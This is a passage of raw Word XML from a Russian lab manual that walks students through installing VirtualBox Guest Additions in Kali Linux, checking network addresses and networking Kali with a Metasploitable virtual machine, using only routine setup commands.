        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E49E7">
        <w:t>Guest</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003E49E7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003E49E7">
        <w:t>Additions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="732CDE57" w14:textId="22AECFEC" w:rsidR="003A724A" w:rsidRDefault="00945933" w:rsidP="003E49E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7A558E" wp14:editId="74749540">
            <wp:extent cx="5580000" cy="38745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794" w14:textId="2288B87B" w:rsidR="00A967CE" w:rsidRDefault="00A967CE" w:rsidP="00A967CE">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VBoxGuestAdditions</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>iso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>находится</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>папке</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>установленной</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>виртуальной</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>машиной</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>по</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>умолчанию</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: C:\Program Files\Oracle\VirtualBox)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406EA6A2" w14:textId="1C9F40CB" w:rsidR="00731F49" w:rsidRPr="00A967CE" w:rsidRDefault="00731F49" w:rsidP="001303F2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:t>Произведите</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>запуск</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>дистрибутива</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA95EEA" w14:textId="15F006F1" w:rsidR="00731F49" w:rsidRPr="00BB7707" w:rsidRDefault="00731F49" w:rsidP="001303F2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>В</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731F49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Boot</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731F49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>menu</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>выберите</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>пункт</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00731F49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Live</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>amd</w:t>
      </w:r>
      <w:r w:rsidRPr="00A967CE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34470998" w14:textId="77777777" w:rsidR="00731F49" w:rsidRPr="0058112A" w:rsidRDefault="00731F49" w:rsidP="001303F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E378B0D" w14:textId="743B4071" w:rsidR="00945933" w:rsidRPr="00331D6F" w:rsidRDefault="00BB7707" w:rsidP="001303F2">
      <w:pPr>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00331D6F">
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="0064255A" w:rsidRPr="00331D6F">
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AC4860" w:rsidRPr="00331D6F">
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r w:rsidRPr="00331D6F">
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00331D6F">
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00331D6F">
        <w:rPr>
          <w:spacing w:val="-12"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00331D6F">
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> на добавленном виртуальном </w:t>
      </w:r>
      <w:r w:rsidR="00AC4860" w:rsidRPr="00331D6F">
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>диске</w:t>
      </w:r>
      <w:r w:rsidRPr="00331D6F">
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve"> открыть с помощью ПКМ терминал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20241F25" w14:textId="30D7136E" w:rsidR="002E3825" w:rsidRDefault="00331D6F" w:rsidP="00331D6F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123D9" wp14:editId="1AB85AD0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>489585</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>702945</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="952500" cy="714375"/>
                <wp:effectExtent l="19050" t="19050" r="38100" b="4762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14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42AC8A3A" id="Овал 10" o:spid="_x0000_s1026" style="position:absolute;margin-left:38.55pt;margin-top:55.35pt;width:7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" filled="f" strokecolor="#c00000" strokeweight="4.5pt">
                <v:stroke joinstyle="miter"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="002E3825">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55D575BF" wp14:editId="51AA5278">
            <wp:extent cx="5580000" cy="274489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7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4C83" w14:textId="6C0D397D" w:rsidR="00331D6F" w:rsidRDefault="00331D6F" w:rsidP="00331D6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6372C9" wp14:editId="549097FF">
            <wp:extent cx="5579603" cy="42767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727"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="42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021E" w14:textId="2B9FD1AB" w:rsidR="00BB7707" w:rsidRPr="00BB7707" w:rsidRDefault="00BB7707" w:rsidP="001303F2">
      <w:r>
        <w:t>Установить</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB7707">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB7707">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Guest</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB7707">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB7707">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Additions</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> с помощью команд:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DE6543" w14:textId="77777777" w:rsidR="00AC4860" w:rsidRPr="005405C2" w:rsidRDefault="00AC4860" w:rsidP="001303F2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004971B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005405C2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004971B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>VBoxLinuxAdditions</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005405C2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="004971B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DF98C6" w14:textId="77777777" w:rsidR="002F4A45" w:rsidRPr="00F32FA9" w:rsidRDefault="002F74B4" w:rsidP="001303F2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004971B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005405C2">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004971B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF4D12D" w14:textId="5BDC83E8" w:rsidR="002F74B4" w:rsidRDefault="002F74B4" w:rsidP="001303F2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Настроить</w:t>
      </w:r>
      <w:r w:rsidR="00BB7707">
        <w:t xml:space="preserve"> под себя</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> разрешение</w:t>
      </w:r>
      <w:r w:rsidR="00BB7707">
        <w:t xml:space="preserve"> экрана</w:t>
      </w:r>
      <w:r w:rsidR="0058112A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54097EE4" w14:textId="3BCE1BFF" w:rsidR="002F74B4" w:rsidRPr="0058112A" w:rsidRDefault="002F74B4" w:rsidP="001303F2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="14"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D14E219" w14:textId="6363ED86" w:rsidR="00BB7707" w:rsidRPr="00BB7707" w:rsidRDefault="00BB7707" w:rsidP="001303F2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB7707">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>II</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB7707">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">. Начало работы в </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB7707">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB7707">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB7707">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B55DEFA" w14:textId="65B3F04D" w:rsidR="0064255A" w:rsidRPr="00A333D7" w:rsidRDefault="00BB7707" w:rsidP="001303F2">
      <w:r>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="0064255A" w:rsidRPr="00866471">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>Проверить н</w:t>
      </w:r>
      <w:r w:rsidR="0064255A">
        <w:t xml:space="preserve">астройка </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">локальной машины </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB7707">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4316B0A9" w14:textId="598E82DF" w:rsidR="002E3825" w:rsidRPr="00BB7707" w:rsidRDefault="002E3825" w:rsidP="00331D6F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3F9E05" wp14:editId="7EDF82CC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1108710</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>351790</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="428625" cy="255919"/>
                <wp:effectExtent l="19050" t="19050" r="47625" b="2984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591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6EEB4879" id="Овал 6" o:spid="_x0000_s1026" style="position:absolute;margin-left:87.3pt;margin-top:27.7pt;width:33.75pt;height:2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5512B90" wp14:editId="7356A18F">
            <wp:extent cx="5580000" cy="2759238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145"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="275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0A8D" w14:textId="45F38E1D" w:rsidR="00331D6F" w:rsidRPr="00331D6F" w:rsidRDefault="00331D6F" w:rsidP="001303F2">
      <w:r>
        <w:t>Ввести в терминале команду</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7857D0BE" w14:textId="47B0ABCF" w:rsidR="002F74B4" w:rsidRPr="004971B4" w:rsidRDefault="002F74B4" w:rsidP="001303F2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004971B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004971B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004971B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF00481" w14:textId="62F172A3" w:rsidR="002F74B4" w:rsidRDefault="00BB7707" w:rsidP="001303F2">
      <w:r>
        <w:t>Обратить внимание на факт того, что</w:t>
      </w:r>
      <w:r w:rsidR="002F74B4">
        <w:t xml:space="preserve"> компьютеры </w:t>
      </w:r>
      <w:r w:rsidR="004971B4">
        <w:t xml:space="preserve">находятся </w:t>
      </w:r>
      <w:r w:rsidR="002F74B4">
        <w:t xml:space="preserve">не в </w:t>
      </w:r>
      <w:r w:rsidR="004971B4">
        <w:t>одной локальной сети.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C7BA58" w14:textId="5BDC7EA9" w:rsidR="004971B4" w:rsidRPr="005405C2" w:rsidRDefault="004971B4" w:rsidP="001303F2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Выключить</w:t>
      </w:r>
      <w:r w:rsidRPr="005405C2">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E9AFE4" w14:textId="77777777" w:rsidR="003A724A" w:rsidRPr="004971B4" w:rsidRDefault="006054A7" w:rsidP="001303F2">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004971B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004971B4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> shutdown –h now</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0D8E4E" w14:textId="77777777" w:rsidR="002E3101" w:rsidRPr="0058112A" w:rsidRDefault="002E3101" w:rsidP="005F4060">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="14"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CBB168" w14:textId="3447B61D" w:rsidR="00C10AF0" w:rsidRDefault="00C10AF0" w:rsidP="00D63AC5">
      <w:r>
        <w:t>8. Выполните</w:t>
      </w:r>
      <w:r w:rsidR="00D63AC5">
        <w:t xml:space="preserve"> настройку локальной сети </w:t>
      </w:r>
      <w:r w:rsidR="00D63AC5" w:rsidRPr="00D63AC5">
        <w:t xml:space="preserve">аналогично </w:t>
      </w:r>
      <w:r w:rsidR="00D63AC5">
        <w:t>на обеих виртуальных машинах (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D63AC5" w:rsidRPr="00D63AC5">
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D63AC5" w:rsidRPr="00D63AC5">
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D63AC5" w:rsidRPr="00D63AC5">
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D63AC5" w:rsidRPr="00D63AC5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D63AC5" w:rsidRPr="00D63AC5">
        <w:t>Linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D63AC5">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C18FCF6" w14:textId="617BC1EE" w:rsidR="002E3101" w:rsidRPr="0064255A" w:rsidRDefault="007B2404" w:rsidP="00D4531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00C642" wp14:editId="0E38D401">
            <wp:extent cx="5760000" cy="260115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9" b="33535"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="260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C52D" w14:textId="35BD2F94" w:rsidR="00E6762B" w:rsidRDefault="00D63AC5" w:rsidP="00C10AF0">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C10AF0" w:rsidRPr="00C10AF0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>Если у Вас не сохранилась</w:t>
      </w:r>
      <w:r w:rsidR="00C10AF0" w:rsidRPr="00C10AF0">
        <w:rPr>
          <w:color w:val="C00000"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C10AF0" w:rsidRPr="00C10AF0">
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">виртуальная машина </w:t>
      </w:r>
      <w:r w:rsidR="00E6762B" w:rsidRPr="00C10AF0">
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-8"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00C10AF0" w:rsidRPr="00C10AF0">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> с лабораторной работы № 1</w:t>
      </w:r>
      <w:r w:rsidR="00C10AF0">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>, выполните пункты</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> 9.1</w:t>
      </w:r>
      <w:r w:rsidR="00F32FA9">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="00C10AF0">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00D63AC5">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>.5</w:t>
      </w:r>
      <w:r w:rsidR="00F32FA9">
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>, в другом случае переходите к пункту 10.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D70181" w14:textId="77777777" w:rsidR="0058112A" w:rsidRPr="00D63AC5" w:rsidRDefault="0058112A" w:rsidP="00C10AF0">
      <w:pPr>
        <w:rPr>
          <w:bCs/>
          <w:spacing w:val="-8"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="659E4728" w14:textId="53CFD961" w:rsidR="00E6762B" w:rsidRPr="005D4A9F" w:rsidRDefault="00D63AC5" w:rsidP="00E6762B">
      <w:r w:rsidRPr="005405C2">
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidR="00E6762B">
        <w:t xml:space="preserve">1. Скачать исследуемый дистрибутив </w:t>
      </w:r>
      <w:r w:rsidR="00E6762B" w:rsidRPr="00E67DFD">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="041CB462" w14:textId="77777777" w:rsidR="00E6762B" w:rsidRDefault="00A72E08" w:rsidP="00E6762B">
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="00E6762B">
          <w:rPr>
            <w:rStyle w:val="af1"/>
          </w:rPr>
          <w:t>https://sourceforge.net/projects/metasploitable/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7CDD4E33" w14:textId="77777777" w:rsidR="0058112A" w:rsidRDefault="0058112A" w:rsidP="00E6762B"/>
    <w:p w14:paraId="3C3EDAA5" w14:textId="1461894F" w:rsidR="00E6762B" w:rsidRDefault="00D63AC5" w:rsidP="00E6762B">
      <w:r w:rsidRPr="00D63AC5">
        <w:t>9.</w:t>
      </w:r>
      <w:r w:rsidR="00E6762B" w:rsidRPr="009B5379">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
